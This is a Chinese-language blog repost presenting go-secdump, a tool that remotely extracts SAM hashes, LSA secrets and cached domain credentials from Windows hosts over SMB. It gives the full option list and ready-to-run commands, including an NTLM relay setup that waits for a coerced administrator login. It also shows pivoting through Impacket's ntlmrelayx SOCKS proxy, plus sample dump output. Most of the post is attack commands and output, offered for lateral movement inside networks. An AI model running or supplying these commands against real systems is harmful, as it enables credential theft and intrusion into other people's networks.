内网神器 - 远程转储 Windows 注册表

admin
admin
admin
108721
文章
90
评论
2024年6月29日10:02:18评论0 views字数 3799阅读12分39秒阅读模式

         Go-secdump 是一个工具,用于远程从 SAM 注册表配置单元提取哈希值以及从 SECURITY 配置单元提取 LSA 机密和缓存哈希值,无需任何远程代理,也无需接触磁盘。

内网神器 - 远程转储 Windows 注册表

下载 :

https://github.com/jfjallid/go-secdump

Usage: ./go-secdump [options]
options:      --host <target>       Hostname or ip address of remote server  -P, --port <port>         SMB Port (default 445)  -d, --domain <domain>     Domain name to use for login  -u, --user <username>     Username  -p, --pass <pass>         Password  -n, --no-pass             Disable password prompt and send no credentials      --hash <NT Hash>      Hex encoded NT Hash for user password      --local               Authenticate as a local user instead of domain user      --dump                Saves the SAM and SECURITY hives to disk and                            transfers them to the local machine.      --sam                 Extract secrets from the SAM hive explicitly. Only other explicit targets are included.      --lsa                 Extract LSA secrets explicitly. Only other explicit targets are included.      --dcc2                Extract DCC2 caches explicitly. Only ohter explicit targets are included.      --backup-dacl         Save original DACLs to disk before modification      --restore-dacl        Restore DACLs using disk backup. Could be useful if automated restore fails.      --backup-file         Filename for DACL backup (default dacl.backup)      --relay               Start an SMB listener that will relay incoming                            NTLM authentications to the remote server and                            use that connection. NOTE that this forces SMB 2.1                            without encryption.      --relay-port <port>   Listening port for relay (default 445)      --socks-host <target> Establish connection via a SOCKS5 proxy server      --socks-port <port>   SOCKS5 proxy port (default 1080)  -t, --timeout             Dial timeout in seconds (default 5)      --noenc               Disable smb encryption      --smb2                Force smb 2.1      --debug               Enable debug logging      --verbose             Enable verbose logging  -o, --output              Filename for writing results (default is stdout). Will append to file if it exists.  -v, --version             Show version

 

DACL

        go-secdump 将自动尝试修改然后恢复所需注册表项的 DACL。但是,如果在恢复过程中出现问题(例如网络断开连接或其他中断),则远程注册表将保留修改后的 DACL。

使用该--backup-dacl参数可以存储修改前的原始 DACL 的序列化副本。如果发生连接问题,可以使用该--restore-dacl参数从文件中恢复 DACL。

 

转储所有注册表机密

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --localor./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam --lsa --dcc2

 

仅转储 SAM、LSA 或 DCC2 缓存机密

./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --lsa./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --dcc2

 

使用 NTLM 中继转储注册表机密

启动监听器

./go-secdump --host 192.168.0.100 -n --relay

 

以某种方式从具有 192.168.0.100 管理权限的客户端触发对您的机器的身份验证,然后等待转储的机密。

YYYY/MM/DD HH:MM:SS smb [Notice] Client connected from 192.168.0.30:49805YYYY/MM/DD HH:MM:SS smb [Notice] Client (192.168.0.30:49805) successfully authenticated as (domain.localAdministrator) against (192.168.0.100:445)!Net-NTLMv2 Hash: Administrator::domain.local:34f4533b697afc39:b4dcafebabedd12deadbeeffef1cea36:010100000deadbeef59d13adc22dda02023/12/13 14:47:28 [Notice] [+] Signing is NOT required2023/12/13 14:47:28 [Notice] [+] Login successful as domain.localAdministrator[*] Dumping local SAM hashesName: AdministratorRID: 500NT: 2727D7906A776A77B34D0430EAACD2C5
Name: GuestRID: 501NT: <empty>
Name: DefaultAccountRID: 503NT: <empty>
Name: WDAGUtilityAccountRID: 504NT: <empty>
[*] Dumping LSA Secrets[*] $MACHINE.ACC$MACHINE.ACC: 0x15deadbeef645e75b38a50a52bdb67b4$MACHINE.ACC:plain_password_hex:47331e26f48208a7807cafeababe267261f79fdc38c740b3bdeadbeef7277d696bcafebabea62bb5247ac63be764401adeadbeef4563cafebabe43692deadbeef03f...[*] DPAPI_SYSTEMdpapi_machinekey: 0x8afa12897d53deadbeefbd82593f6df04de9c100dpapi_userkey: 0x706e1cdea9a8a58cafebabe4a34e23bc5efa8939[*] NL$KMNL$KM: 0x53aa4b3d0deadbeef42f01ef138c6a74[*] Dumping cached domain credentials (domain/username:hash)DOMAIN.LOCAL/Administrator:$DCC2$10240#Administrator#97070d085deadbeef22cafebabedd1ab

SOCKS代理

使用上游 SOCKS5 代理转储机密,以进行枢转或利用 Impacket 的 ntlmrelayx.py SOCKS 服务器功能。

当使用 ntlmrelayx.py 作为上行代理时,提供的用户名必须与经过身份验证的客户端匹配,但密码可以为空。

./ntlmrelayx.py -socks -t 192.168.0.100 -smb2support --no-http-server --no-wcf-server --no-raw-server...
./go-secdump --host 192.168.0.100 --user Administrator -n --socks-host 127.0.0.1 --socks-port 1080

 

 

原文始发于微信公众号(TtTeam):内网神器 - 远程转储 Windows 注册表

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月29日10:02:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网神器 - 远程转储 Windows 注册表https://cn-sec.com/archives/2895161.html

发表评论

匿名网友 填写信息